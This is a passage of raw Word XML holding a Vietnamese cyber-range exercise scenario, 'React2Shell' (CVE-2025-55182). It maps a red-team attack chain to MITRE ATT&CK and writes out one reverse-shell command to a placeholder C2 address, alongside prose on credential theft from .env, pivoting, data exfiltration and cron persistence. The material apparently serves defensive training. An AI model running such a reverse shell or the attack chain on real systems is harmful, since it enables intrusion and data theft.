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01474" w14:textId="345A9C51" w:rsidR="00931D9B" w:rsidRDefault="21C1C374" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="33F92B36">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Attack Flow Cyber Range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A30AE" w14:textId="5C52268B" w:rsidR="70A3B46D" w:rsidRDefault="70A3B46D" w:rsidP="00C0646B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="33F92B36">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kị</w:t>
      </w:r>
      <w:r w:rsidR="654AECDA" w:rsidRPr="33F92B36">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:r w:rsidRPr="33F92B36">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> bản 1: React2Sh</w:t>
      </w:r>
      <w:r w:rsidR="1DFF4D5C" w:rsidRPr="33F92B36">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A2150" w14:textId="2C1F5DE8" w:rsidR="17B3E3BD" w:rsidRDefault="17B3E3BD" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Tóm tắt kịch bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF92424" w14:textId="39821CD7" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t>Trong kịch bản này, RedTeam tấn công một máy chủ web công khai thông qua lỗ hổng React2Shell (CVE-2025-55182). Trong quá trình tấn công, RedTeam khai thác cơ chế giải mã dữ liệu không an toàn (insecure deserialization) của React Server Components để thiết lập một reverse shell. Shell này sau đó được sử dụng để trích xuất thông tin đăng nhập cơ sở dữ liệu từ các file cấu hình môi trường và thiết lập đường hầm (pivot) thâm nhập vào mạng nội bộ bằng các công cụ proxy. Kẻ tấn công tiếp tục truy cập vào máy chủ cơ sở dữ liệu PostgreSQL nội bộ để đánh cắp dữ liệu nhạy cảm và duy trì quyền truy cập (persistence) bằng cách sử dụng cron job của hệ thống. Cuộc tấn công được duy trì liên tục cho đến khi bị BlueTeam chặn lại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4AF358" w14:textId="77777777" w:rsidR="00CA4A0D" w:rsidRPr="00CA4A0D" w:rsidRDefault="00CA4A0D" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03342081" w14:textId="4E3FE61B" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CHI TIẾT CÁC GIAI ĐOẠN TẤN CÔNG:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3772C17D" w14:textId="2850086E" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t>Việc ánh xạ theo khung MITRE ATT&amp;CK dưới đây sẽ giúp chuẩn hóa các bước thực hiện, rất thuận tiện để chuyển đổi thành các sơ đồ luồng tấn công (Attack Flow Diagrams) hoặc sơ đồ tư duy phân tích chiến thuật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389670A5" w14:textId="77777777" w:rsidR="00CA4A0D" w:rsidRPr="00CA4A0D" w:rsidRDefault="00CA4A0D" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A774169" w14:textId="754C8437" w:rsidR="7202D49E" w:rsidRPr="007D0621" w:rsidRDefault="7202D49E" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GIAI ĐOẠN 1: TRINH SÁT VÀ CHUẨN BỊ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C45BB09" w14:textId="34F68E20" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hành động:</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> RedTeam tiến hành thu thập thông tin về bề mặt tấn công của mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F7C5B5" w14:textId="47A66D0E" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kỹ thuật</w:t>
      </w:r>
      <w:r w:rsidR="51DEDA55" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="7DF9ED33" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Active Scanning (T1595), Gather Victim Network Information (T1590).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428DC299" w14:textId="5C57D049" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t>Sử dụng công cụ OSINT và nmap để quét các port đang mở trên dải IP public của mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B92F924" w14:textId="317B49E5" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t>Phát hiện ứng dụng web đang lắng nghe tại port 443. Thông qua phân tích header HTTP và mã nguồn trang (Wappalyzer), xác định frontend được xây dựng bằng React 19 / Next.js 15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73772192" w14:textId="59CE226B" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve">Phát hiện ứng dụng có sử dụng tính năng </w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server Actions</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t>, một vector tiềm năng cho lỗ hổng Insecure Deserialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F47B4" w14:textId="3926A0CB" w:rsidR="7202D49E" w:rsidRPr="007D0621" w:rsidRDefault="7202D49E" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GIAI ĐOẠN 2: TRUY CẬP BAN ĐẦU QUA REACT2SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA6AAE" w14:textId="06EF7907" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hành động:</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> Khai thác lỗ hổng CVE-2025-55182 để chiếm quyền thực thi mã trên máy chủ web của mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDBB39B" w14:textId="22F35FFC" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kỹ thuật</w:t>
      </w:r>
      <w:r w:rsidR="4BD12B13" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="4E61CB08" w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> Exploit Public-Facing Application (T1190)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D993AF5" w14:textId="29A06A19" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t>Red Team cấu hình proxy (Burp Suite) để can thiệp vào các request HTTP POST gửi đến endpoint Server Actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD769F" w14:textId="6240B743" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:lastRenderedPageBreak/>
        <w:t>Tạo một payload JSON đặc biệt, chèn thuộc tính __proto__ độc hại nhằm gây ra lỗi Prototype Pollution trong quá trình React phân tích cú pháp (parsing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0DD88" w14:textId="012AE12D" w:rsidR="7202D49E" w:rsidRDefault="7202D49E" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t>Gửi request đã bị chỉnh sửa đến máy chủ web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178DF9DD" w14:textId="67D30797" w:rsidR="407ADB0D" w:rsidRPr="007D0621" w:rsidRDefault="407ADB0D" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GIAI ĐOẠN 3: THỰC THI &amp; THIẾT LẬP C2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A52FE4F" w14:textId="6A0C48BD" w:rsidR="407ADB0D" w:rsidRDefault="407ADB0D" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hành động:</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> Kích hoạt thực thi mã RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A5AC9" w14:textId="0EE57C28" w:rsidR="15A50DFA" w:rsidRDefault="15A50DFA" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kỹ thuật</w:t>
      </w:r>
      <w:r w:rsidR="51AB3586" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="121E5840" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="121E5840" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command and Scripting Interpreter (T1059), Non-Application Layer Protocol (T1095)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E086FD0" w14:textId="63CBD1A6" w:rsidR="15A50DFA" w:rsidRDefault="15A50DFA" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t>Payload Prototype Pollution thành công ghi đè lên các hàm hệ thống của Node.js, buộc máy chủ thực thi lệnh shell (ví dụ: bash -c 'bash -i &gt;&amp; /dev/tcp/[ip_của_c2]/4444 0&gt;&amp;1').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3610A" w14:textId="211E4B0C" w:rsidR="15A50DFA" w:rsidRDefault="15A50DFA" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t>Máy chủ web server chủ động tạo một kết nối ngược (Reverse Shell) về C2 Server của Red Team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC48760" w14:textId="46B610A6" w:rsidR="15A50DFA" w:rsidRDefault="15A50DFA" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t>Red Team thành công chiếm được quyền www-data hoặc node trên máy chủ Web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28855D11" w14:textId="7FDA3887" w:rsidR="14736C57" w:rsidRPr="007D0621" w:rsidRDefault="14736C57" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GIAI ĐOẠN 4: LEO THANG &amp; XÂM NHẬP NỘI BỘ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115D5B8" w14:textId="4CBF6355" w:rsidR="14736C57" w:rsidRDefault="14736C57" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hành động:</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> Từ máy chủ Web, RedTeam tìm cách di chuyển sang máy chủ Database nằm sâu trong mạng nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450F7CE0" w14:textId="1C11483C" w:rsidR="14736C57" w:rsidRDefault="14736C57" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kỹ thuật</w:t>
      </w:r>
      <w:r w:rsidR="58A3BFD2" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="58E9704C" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="58E9704C" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Proxy: Internal Proxy (T1090.001), Credentials from Password Stores (T1555)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B59CC" w14:textId="50AD1ADC" w:rsidR="14736C57" w:rsidRDefault="14736C57" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thu thập thông tin nội bộ (Local Recon):</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> Red Team đọc file </w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> trên máy chủ Web và thu được thông tin đăng nhập PostgreSQL nội bộ cùng địa chỉ IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D904D44" w14:textId="2296DD85" w:rsidR="14736C57" w:rsidRDefault="14736C57" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thiết lập Pivot:</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> Do máy chủ C2 không thể giao tiếp trực tiếp với máy chủ </w:t>
      </w:r>
      <w:r w:rsidR="2282F9DF" w:rsidRPr="3FA87A0B">
        <w:t>CSDL</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> (nằm trong mạng LAN), Red Team sử dụng một công cụ đường hầm (như Chisel hoặc SSH Dynamic Port Forwarding) cài đặt tạm thời trên máy chủ Web</w:t>
      </w:r>
      <w:r w:rsidR="779BC790" w:rsidRPr="3FA87A0B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04096B6F" w14:textId="54F07DAF" w:rsidR="14736C57" w:rsidRDefault="14736C57" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pivoting:</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> Máy chủ Web lúc này trở thành một trạm trung chuyển (proxy). Red Team định tuyến các công cụ tấn công từ máy C2 đi qua máy chủ Web để tiến thẳng vào máy chủ Database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E18D07" w14:textId="694D1737" w:rsidR="14736C57" w:rsidRDefault="14736C57" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve">Đăng nhập thành công vào cơ sở dữ liệu bằng thông tin từ file </w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> bị lộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B268C21" w14:textId="50109354" w:rsidR="3065EF54" w:rsidRPr="007D0621" w:rsidRDefault="3065EF54" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GIAI ĐOẠN 5: TRÍCH XUẤT &amp; DUY TRÌ TRUY CẬP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D66DF8" w14:textId="797C0325" w:rsidR="3065EF54" w:rsidRDefault="3065EF54" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hành động:</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> Đảm bảo quyền kiểm soát lâu dài và hoàn thành mục tiêu chiến dịch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2366C09F" w14:textId="0D2BD2D7" w:rsidR="3065EF54" w:rsidRDefault="3065EF54" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kỹ thuật</w:t>
      </w:r>
      <w:r w:rsidR="366AB8F8" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="14EA0A2F" w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System (T1005), Scheduled Task/Job: Cron (T1053.003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE73569" w14:textId="713E8268" w:rsidR="3065EF54" w:rsidRDefault="3065EF54" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exfiltration:</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> Trích xuất các bảng dữ liệu nhạy cảm (thông tin người dùng) từ máy chủ Database  và nén lại, gửi qua đường hầm mã hóa về C2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFCF2CF" w14:textId="719097F2" w:rsidR="3065EF54" w:rsidRDefault="3065EF54" w:rsidP="3FA87A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="3FA87A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Persistence:</w:t>
      </w:r>
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> Để duy trì quyền truy cập trên Web Server đề phòng trường hợp bị khởi động lại, RedTeam thiết lập một backdoor ẩn. Kẻ tấn công tạo một file script .sh độc hại và thêm vào crontab của hệ thống để C2 tự động kết nối lại mỗi 5 phút.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15483921" w14:textId="77777777" w:rsidR="00CA4A0D" w:rsidRDefault="00CA4A0D" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7702D469" w14:textId="79B1BBBF" w:rsidR="7E3DC4FF" w:rsidRPr="007D0621" w:rsidRDefault="7C61B6A5" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SƠ ĐỒ LUỒNG TẤN CÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B57F5" w14:textId="327C841A" w:rsidR="33F92B36" w:rsidRDefault="00C0646B" w:rsidP="33F92B36">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
